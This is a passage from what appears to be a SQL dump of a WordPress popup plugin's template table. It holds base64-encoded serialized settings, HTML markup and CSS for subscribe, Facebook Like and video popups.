oiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjMDAwMDAwIjtzOjEwOiJmb250X3R4dF8xIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8xIjtzOjc6IiMwMDAwMDAiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM5Nzk2OTYiO3M6OToiY2xvc2VfYnRuIjtzOjExOiJsaXN0c19ibGFjayI7czo3OiJidWxsZXRzIjtzOjExOiJsaXN0c19ncmVlbiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fXM6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjU6IkpvaW4hIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6NTU6IkluY3JlYXNlIHN1YnNjcmliZXJzLCBzb2NpYWwgZm9sbG93ZXJzIG9yIGFkdmVydGlzZW1lbnQiO3M6OToiZW5iX3R4dF8wIjtzOjE6IjEiO3M6OToiZW5iX3R4dF8xIjtzOjE6IjEiO3M6MTM6ImVuYl9mb290X25vdGUiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE3OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUiO3M6NToidHh0XzAiO3M6NDQ6IjxwPlRoZSBCZXN0IFdvcmRQcmVzcyBQb3BVcCBvcHRpbiBwbHVnaW48L3A+IjtzOjU6InR4dF8xIjtzOjMxMzoiPHA+UG9wdXAgYnkgU3Vwc3lzdGljIGxldHMgeW91IGVhc2lseSBjcmVhdGUgZWxlZ2FudCBvdmVybGFwcGluZyB3aW5kb3dzIHdpdGggdW5saW1pdGVkIGZlYXR1cmVzLiBQb3AtdXBzIHdpdGggU2xpZGVyLCBMaWdodGJveCwgQ29udGFjdCBhbmQgU3Vic2NyaXB0aW9uIGZvcm1zIGFuZCBtb3JlOjwvcD48dWw+PGxpPlVubGltaXRlZCBDb250ZW50IEN1c3RvbWl6YXRpb248L2xpPjxsaT5BdXRvIE9wZW4gUG9wdXBzPC9saT48bGk+Q29udGFjdCBGb3JtIHdpdGggcG9wLXVwPC9saT48bGk+UG9wdXAgT3BlbmluZyBBbmltYXRpb25zPC9saT48L3VsPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiMyI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIyIjt9fQ==','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n  	<div class=\"ppsPopupListsInner\">\r\n  		[if enb_txt_0]\r\n  		<div class=\"ppsPopupTxt ppsPopupTxt_0\">\r\n          <div class=\"ppsTxtContent\">[txt_0]</div>\r\n      	</div>\r\n  		[endif]\r\n      	<div class=\"ppsPopupTblCols\">\r\n          <div class=\"ppsPopupLeftCol\">\r\n            [if enb_label]\r\n            <div class=\"ppsPopupLabel\">[label]</div>\r\n            [endif]\r\n            [if enb_txt_1]\r\n            <div class=\"ppsPopupTxt ppsPopupTxt_1\">[txt_1]</div>\r\n            [endif]\r\n          </div>\r\n          <div class=\"ppsPopupRightCol\">\r\n            [if enb_subscribe]\r\n            <div class=\"ppsSubscribeShell\">\r\n              <div class=\"ppsBigArrow\"></div>\r\n              [sub_form_start]\r\n              [sub_fields_html]\r\n              <input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n              [sub_form_end]\r\n            </div>\r\n            [endif]\r\n            [if enb_sm]\r\n            <div class=\"ppsSm\">\r\n              [sm_html]\r\n            </div>\r\n            [endif]\r\n            [if enb_foot_note]\r\n            <div class=\"ppsFootNote\">\r\n              [foot_note]\r\n            </div>\r\n            [endif]\r\n          </div>\r\n      	</div>\r\n  	</div>\r\n  	\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: Helvetica,Arial,sans-serif;\r\n  	font-size: 14px;\r\n  \r\n  	[if bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #414141;\r\n    font-size: 28px;\r\n    font-style: normal;\r\n    font-weight: bold;\r\n    letter-spacing: -1px;\r\n    line-height: 35px;\r\n    text-shadow: 0 1px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupListsInner {\r\n  	[if bg_type_0 == \'color\']\r\n    background: {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}; /* Old browsers */\r\n    background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* FF3.6+ */\r\n    background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%,[bg_color_0])); /* Chrome,Safari4+ */\r\n    background: -webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Chrome10+,Safari5.1+ */\r\n    background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Opera 12+ */\r\n    background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* IE10+ */\r\n    background: radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* W3C */\r\n    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'#eaeaea\',GradientType=1 ); /* IE6-9 fallback on horizontal gradient */\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	width: 100%;\r\n  	border-bottom: 1px solid {{ adjust_brightness(popup.params.tpl.bg_color_0, -50) }};\r\n  	clear: both;\r\n  	font-size: 13px;\r\n    font-weight: bold;\r\n  	font-family: Helvetica,Arial,sans-serif;\r\n  	[if bg_type_0 == \'color\']\r\n  	background: [bg_color_0]; /* Old browsers */\r\n    background: -moz-linear-gradient(top, [bg_color_0] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* FF3.6+ */\r\n    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,[bg_color_0]), color-stop(100%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }})); /* Chrome,Safari4+ */\r\n    background: -webkit-linear-gradient(top, [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* Chrome10+,Safari5.1+ */\r\n    background: -o-linear-gradient(top, [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* Opera 11.10+ */\r\n    background: -ms-linear-gradient(top, [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* IE10+ */\r\n    background: linear-gradient(to bottom, [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }} 100%); /* W3C */\r\n    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'[bg_color_0]\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 20) }}\',GradientType=0 ); /* IE6-9 */\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 .ppsTxtContent {\r\n	padding: 10px 10px 10px 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTblCols {\r\n	display: table;\r\n  	padding: 10px 10px 10px 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLeftCol {\r\n	display: table-cell;\r\n  	vertical-align: top;\r\n  	[if enb_subscribe]\r\n  	width: 64%;\r\n  	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupRightCol {\r\n  	width: 36%;\r\n	display: table-cell;\r\n  	position: relative;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 1px solid #000;\r\n  	border-radius: 10px;\r\n  	display: block;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n  	vertical-align: middle;\r\n  	height: 40px;\r\n  	background-color: transparent;\r\n  	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	margin-left: -10px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: auto;\r\n  	font-family: inherit;\r\n  	padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/mail-icon.png\");\r\n  	background-repeat: no-repeat;\r\n  	background-position: 90% center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border: none;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1];\r\n    background: -moz-linear-gradient(90deg, [bg_color_1] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n    background: -webkit-linear-gradient(270deg, [bg_color_1] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n    background: -o-linear-gradient(270deg, [bg_color_1] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n    background: -ms-linear-gradient(270deg, [bg_color_1] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n    background: linear-gradient(0deg, [bg_color_1]) 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 100) }} 63%);\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #000;\r\n    font-size: 20px;\r\n    text-shadow: 2px 2px 2px #000;\r\n  	cursor: pointer;\r\n  	max-width: 230px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n    color: #979696;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: xx-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n    text-align: left;\r\n  	margin-left: 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsBigArrow {\r\n	[if bg_type_2 == \'img\']\r\n  	position: absolute;\r\n  	width: 102px;\r\n    height: 81px;\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	top: -20px;\r\n  	right: 20px;\r\n  	z-index: 100;\r\n  	[else]\r\n  	display: none;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSuccessMsg {\r\n	padding: 55px 5px 5px;\r\n}','',1,1,1,1,0,0,0,'2015-01-13 18:22:48',13,0),(4,'Facebook Like',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjIwOntzOjU6IndpZHRoIjtzOjM6IjMwMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czo2OiJoZWlnaHQiO3M6MDoiIjtzOjE0OiJoZWlnaHRfbWVhc3VyZSI7czoyOiJweCI7czoxMjoiZmJfbGlrZV9vcHRzIjthOjM6e3M6NDoiaHJlZiI7czo1NzoiaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3BhZ2VzL1N1cHN5c3RpYy8xMzg5MzkwMTk4MDI4OTk5IjtzOjQ6InRhYnMiO2E6MTp7aTowO3M6ODoidGltZWxpbmUiO31zOjEzOiJzaG93X2ZhY2VwaWxlIjtzOjE6IjEiO31zOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjE1OiJiZ19vdmVybGF5X3R5cGUiO3M6NToiY29sb3IiO3M6MTY6ImJnX292ZXJsYXlfY29sb3IiO3M6NDoiIzAwMCI7czoxNDoiYmdfb3ZlcmxheV9pbWciO3M6MDoiIjtzOjE4OiJiZ19vdmVybGF5X2ltZ19wb3MiO3M6Nzoic3RyZXRjaCI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNmZmZmZmYiO3M6MTU6InJlc3BvbnNpdmVfbW9kZSI7czozOiJkZWYiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6MTE6ImNsYXNzeV9ncmV5IjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czoxOiIxIjtzOjEyOiJzdGF0X2dhX2NvZGUiO3M6MDoiIjt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIxIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjAiO319','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupFbLikeShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n  	[fb_like_widget_html]\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	/*height: [height][height_measure];*/\r\n  	[if bg_type_0 == \'color\']\r\n  	background-color: [bg_color_0];\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-repeat: no_repeat;\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	z-index: 99;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n','',1,1,1,2,0,0,0,'2015-01-16 18:35:51',3,0),(5,'Video List',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoxMDoic2hvd19wYWdlcyI7czozOiJhbGwiO3M6MTQ6InNob3dfdGltZV9mcm9tIjtzOjc6IjEyOjAwYW0iO3M6MTI6InNob3dfdGltZV90byI7czo3OiIxMjowMGFtIjtzOjE0OiJzaG93X2RhdGVfZnJvbSI7czowOiIiO3M6MTI6InNob3dfZGF0ZV90byI7czowOiIiO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoxNToiY291bnRfdGltZXNfbnVtIjtzOjE6IjEiO3M6MTU6ImNvdW50X3RpbWVzX21lcyI7czozOiJkYXkiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9zZWFyY2hfZW5naW5lc19zaG93IjtzOjE6IjAiO3M6MTg6ImhpZGVfcHJlZ191cmxfc2hvdyI7czoxOiIwIjtzOjEzOiJoaWRlX3ByZWdfdXJsIjtzOjA6IiI7czoyNDoiaGlkZV9mb3JfdXNlcl9yb2xlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTo2Mzp7czo5OiJ2aWRlb191cmwiO3M6NDM6Imh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL3dhdGNoP3Y9bktJdTl5ZW41bmMiO3M6NToid2lkdGgiO3M6MzoiODI0IjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjY6ImhlaWdodCI7czozOiI0MDAiO3M6MTQ6ImhlaWdodF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjE1OiJiZ19vdmVybGF5X3R5cGUiO3M6NToiY29sb3IiO3M6MTY6ImJnX292ZXJsYXlfY29sb3IiO3M6NDoiIzAwMCI7czoxNDoiYmdfb3ZlcmxheV9pbWciO3M6MDoiIjtzOjE4OiJiZ19vdmVybGF5X2ltZ19wb3MiO3M6Nzoic3RyZXRjaCI7czo5OiJiZ190eXBlXzAiO3M6NDoibm9uZSI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiMzYmQwZDAiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjMGU2ODY4IjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzAxNTA1MCI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzAxNTA1MCI7czoxNToicmVzcG9uc2l2ZV9tb2RlIjtzOjM6ImRlZiI7czoxNzoicmVpZHJlY3Rfb25fY2xvc2UiO3M6MDoiIjtzOjk6ImNsb3NlX2J0biI7czoxMToiY2xhc3N5X2dyZXkiO3M6MTE6ImxheWVyZWRfcG9zIjtzOjA6IiI7czo1OiJsYWJlbCI7czoyNjoiQ2hlY2sgdmlkZW8gYW5kIHN1YnNjcmliZSEiO3M6MTM6ImVuYl9mb290X25vdGUiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE4OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUgIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToi